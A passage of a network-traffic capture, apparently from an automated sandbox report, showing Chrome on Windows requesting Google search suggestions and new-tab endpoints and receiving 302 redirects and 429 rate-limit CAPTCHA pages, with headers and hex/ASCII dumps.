                                                                    Date: Thu, 02 May 2024 02:59:52 GMT
                                                                    Pragma: no-cache
                                                                    Expires: -1
                                                                    Cache-Control: no-cache, must-revalidate
                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-TlEKPeuAt0bQNoNTeUB3Vg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                    Accept-CH: Sec-CH-UA-Model
                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                    Permissions-Policy: unload=()
                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                    Server: gws
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Accept-Ranges: none
                                                                    Vary: Accept-Encoding
                                                                    Connection: close
                                                                    Transfer-Encoding: chunked
                                                                    2024-05-02 02:59:52 UTC64INData Raw: 36 38 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 61 69 72 62 6e 62 20 69 63 6f 6e 73 20 78 20 6d 65 6e 22 2c 22 65 61 73 74 20 66 6f 72 6b 20 73 61 6e 20 6a 61 63 69 6e 74 6f 20 72 69 76 65 72
                                                                    Data Ascii: 685)]}'["",["airbnb icons x men","east fork san jacinto river
                                                                    2024-05-02 02:59:52 UTC1255INData Raw: 20 66 6c 6f 6f 64 69 6e 67 22 2c 22 6d 69 61 6d 69 20 64 6f 6c 70 68 69 6e 73 20 73 74 65 70 68 65 6e 20 72 6f 73 73 22 2c 22 70 73 20 70 6c 75 73 20 6d 61 79 20 32 30 32 34 20 6d 6f 6e 74 68 6c 79 20 67 61 6d 65 73 22 2c 22 68 65 65 72 61 6d 61 6e 64 69 20 73 61 6e 6a 61 79 20 6c 65 65 6c 61 20 62 68 61 6e 73 61 6c 69 22 2c 22 75 65 66 61 20 63 68 61 6d 70 69 6f 6e 73 20 6c 65 61 67 75 65 20 64 6f 72 74 6d 75 6e 64 20 76 73 20 70 73 67 22 2c 22 66 65 64 65 72 61 6c 20 72 65 73 65 72 76 65 20 69 6e 74 65 72 65 73 74 20 72 61 74 65 73 22 2c 22 63 6f 6c 6c 65 65 6e 20 68 6f 6f 76 65 72 20 76 65 72 69 74 79 20 6d 6f 76 69 65 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65
                                                                    Data Ascii: flooding","miami dolphins stephen ross","ps plus may 2024 monthly games","heeramandi sanjay leela bhansali","uefa champions league dortmund vs psg","federal reserve interest rates","colleen hoover verity movie"],["","","","","","","",""],[],{"google:clie
                                                                    2024-05-02 02:59:52 UTC357INData Raw: 53 42 74 51 36 67 2f 51 2b 59 50 51 37 48 43 37 33 4b 6d 32 48 53 6a 5a 35 46 39 6e 4b 47 43 70 67 72 34 36 6c 49 68 49 31 4d 70 6a 65 53 49 74 6f 42 41 38 59 4e 78 62 35 2b 59 48 79 77 33 54 56 75 57 31 74 61 37 79 51 6c 65 2b 61 32 6d 77 44 52 69 39 79 50 63 69 32 32 39 75 4f 63 48 4a 70 36 4b 53 4f 47 57 61 69 53 51 6f 74 77 52 34 54 47 43 54 78 36 64 50 62 41 35 56 5a 53 39 4c 56 53 79 35 58 42 42 41 30 39 51 41 37 50 45 44 33 4f 72 62 77 6b 33 38 67 52 2f 32 76 69 54 2b 68 59 32 79 7a 77 6d 67 49 57 35 66 55 35 62 53 30 4b 6d 6b 57 4d 4f 43 41 43 41 4e 68 67 44 2f 77 42 58 6f 59 6a 32 67 70 4a 6c 41 45 6b 6c 4c 5a 37 64 62 45 32 2f 4d 34 4b 38 6b 70 61 76 4c 38 77 6f 71 59 31 43 54 30 73 4d 4a 47 74 6b 38 52 74 78 63 33 39 65 65 75 42 33 50 36 5a 63
                                                                    Data Ascii: SBtQ6g/Q+YPQ7HC73Km2HSjZ5F9nKGCpgr46lIhI1MpjeSItoBA8YNxb5+YHyw3TVuW1ta7yQle+a2mwDRi9yPci229uOcHJp6KSOGWaiSQotwR4TGCTx6dPbA5VZS9LVSy5XBBA09QA7PED3Orbwk38gR/2viT+hY2yzwmgIW5fU5bS0KmkWMOCACANhgD/wBXoYj2gpJlAEklLZ7dbE2/M4K8kpavL8woqY1CT0sMJGtk8Rtxc39eeuB3P6Zc
                                                                    2024-05-02 02:59:52 UTC86INData Raw: 35 30 0d 0a 2b 75 41 4e 32 41 46 77 4f 51 50 6c 6a 4f 55 4b 51 75 71 7a 30 39 33 69 65 30 71 4f 35 38 56 6a 75 70 74 78 31 36 33 78 62 53 2b 35 4a 6b 78 6c 58 6b 74 2b 7a 4f 52 31 64 64 4c 44 56 4b 67 46 4b 4a 43 6a 4f 78 35 4e 6a 77 50 63 59 4e 49 36 0d 0a
                                                                    Data Ascii: 50+uAN2AFwOQPljOUKQuqz093ie0qO58Vjuptx163xbS+5JkxlXkt+zOR1ddLDVKgFKJCjOx5NjwPcYNI6
                                                                    2024-05-02 02:59:52 UTC1255INData Raw: 35 65 35 0d 0a 62 4e 61 6c 4d 74 2b 30 42 70 6c 68 6e 61 77 4d 6c 6a 75 47 52 72 58 47 33 78 66 58 72 35 56 48 59 62 4d 61 57 48 4a 36 69 47 6f 6c 57 4f 53 4f 56 58 58 55 62 61 74 2f 58 30 4a 77 58 55 4e 64 54 31 46 51 33 64 33 61 41 53 4b 38 6a 6f 52 70 6a 50 78 43 35 48 6e 2f 41 46 44 45 32 53 39 76 53 4a 4b 63 56 41 6f 61 59 31 47 73 69 31 70 70 35 4b 31 34 68 41 4e 49 55 37 6c 67 50 34 67 70 36 48 79 2b 64 38 52 63 77 7a 6b 6d 48 37 49 55 6e 50 37 78 47 70 6d 64 50 42 72 42 42 56 41 4f 75 77 33 33 35 4e 74 7a 68 69 66 4d 59 36 6d 66 76 59 32 69 57 4f 63 6c 6c 63 67 6b 6b 36 72 43 77 46 72 62 57 33 78 44 7a 4f 70 44 30 46 52 6c 4b 30 35 46 54 4d 2f 65 6f 78 56 39 55 68 59 36 72 36 55 2b 4d 2b 45 39 4f 6d 31 73 42 53 67 76 59 64 6c 44 37 43 7a 4e 4a 34
                                                                    Data Ascii: 5e5bNalMt+0BplhnawMljuGRrXG3xfXr5VHYbMaWHJ6iGolWOSOVXXUbat/X0JwXUNdT1FQ3d3aASK8joRpjPxC5Hn/AFDE2S9vSJKcVAoaY1Gsi1pp5K14hANIU7lgP4gp6Hy+d8RcwzkmH7IUnP7xGpmdPBrBBVAOuw335NtzhifMY6mfvY2iWOcllcgkk6rCwFrbW3xDzOpD0FRlK05FTM/eoxV9UhY6r6U+M+E9Om1sBSgvYdlD7CzNJ4
                                                                    2024-05-02 02:59:52 UTC261INData Raw: 6c 65 76 61 6e 63 65 22 3a 5b 31 32 35 33 2c 31 32 35 32 2c 31 32 35 31 2c 31 32 35 30 2c 36 30 31 2c 36 30 30 2c 35 35 31 2c 35 35 30 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 73 75 62 74 79 70 65 73 22 3a 5b 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 45 4e 54 49 54 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59
                                                                    Data Ascii: levance":[1253,1252,1251,1250,601,600,551,550],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","ENTITY","QUERY","QUERY","QUERY
                                                                    2024-05-02 02:59:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.2249176172.217.1.44431776C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 02:59:52 UTC564OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Cookie: 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA
                                                                    2024-05-02 02:59:53 UTC1453INHTTP/1.1 302 Found
                                                                    Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGKiDzLEGIjBAUeVDNkDlIZK5bJjKqxg5bm1WdYDjlLN5FTPlXAMxmGzLgqn1-pjmnO28YPm4sx4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                    x-hallmonitor-challenge: CgsIqYPMsQYQgqa9OhIEv2CW4Q
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                    Permissions-Policy: unload=()
                                                                    Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                    Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                    Date: Thu, 02 May 2024 02:59:53 GMT
                                                                    Server: gws
                                                                    Content-Length: 427
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Set-Cookie: 1P_JAR=2024-05-02-02; expires=Sat, 01-Jun-2024 02:59:53 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2024-05-02 02:59:53 UTC427INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 64 64 6c 6a 73 6f 6e 25 33 46 61 73 79 6e
                                                                    Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasyn


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.2249177172.217.1.44431776C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 02:59:52 UTC564OUTGET /async/newtab_promos HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Cookie: 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA
                                                                    2024-05-02 02:59:53 UTC1398INHTTP/1.1 302 Found
                                                                    Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGKiDzLEGIjDtjnMJodbdiXF-HQ_fQDkAxnKugxL_IiaU5Bdf1yGe-xSVBDfYF_nK-idk43_IHf0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                    x-hallmonitor-challenge: CgsIqYPMsQYQyeSQPhIEv2CW4Q
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                    Permissions-Policy: unload=()
                                                                    Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                    Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                    Date: Thu, 02 May 2024 02:59:53 GMT
                                                                    Server: gws
                                                                    Content-Length: 417
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Set-Cookie: 1P_JAR=2024-05-02-02; expires=Sat, 01-Jun-2024 02:59:53 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2024-05-02 02:59:53 UTC417INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26
                                                                    Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.2249179172.217.1.44431776C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 02:59:53 UTC742OUTGET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGKiDzLEGIjBAUeVDNkDlIZK5bJjKqxg5bm1WdYDjlLN5FTPlXAMxmGzLgqn1-pjmnO28YPm4sx4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Cookie: 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA
                                                                    2024-05-02 02:59:53 UTC356INHTTP/1.1 429 Too Many Requests
                                                                    Date: Thu, 02 May 2024 02:59:53 GMT
                                                                    Pragma: no-cache
                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Content-Type: text/html
                                                                    Server: HTTP server (unknown)
                                                                    Content-Length: 3131
                                                                    X-XSS-Protection: 0
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2024-05-02 02:59:53 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 64 64 6c 6a 73 6f 6e 3f 61 73 79 6e 63 3d 6e 74 70 3a 32 3c 2f 74 69 74 6c 65 3e
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/ddljson?async=ntp:2</title>
                                                                    2024-05-02 02:59:53 UTC1255INData Raw: 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 77 79 71 6b 51 44 70 52 36 66 4e 76 41 52 41 35 69 79 74 49 46 55 67 58 75 59 5a
                                                                    Data Ascii: tCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="wyqkQDpR6fNvARA5iytIFUgXuYZ
                                                                    2024-05-02 02:59:53 UTC977INData Raw: 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e
                                                                    Data Ascii: ears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the mean


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.2249180172.217.1.44431776C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 02:59:53 UTC738OUTGET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGKiDzLEGIjDtjnMJodbdiXF-HQ_fQDkAxnKugxL_IiaU5Bdf1yGe-xSVBDfYF_nK-idk43_IHf0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Cookie: 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA
                                                                    2024-05-02 02:59:53 UTC356INHTTP/1.1 429 Too Many Requests
                                                                    Date: Thu, 02 May 2024 02:59:53 GMT
                                                                    Pragma: no-cache
                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Content-Type: text/html
                                                                    Server: HTTP server (unknown)
                                                                    Content-Length: 3113
                                                                    X-XSS-Protection: 0
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2024-05-02 02:59:53 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
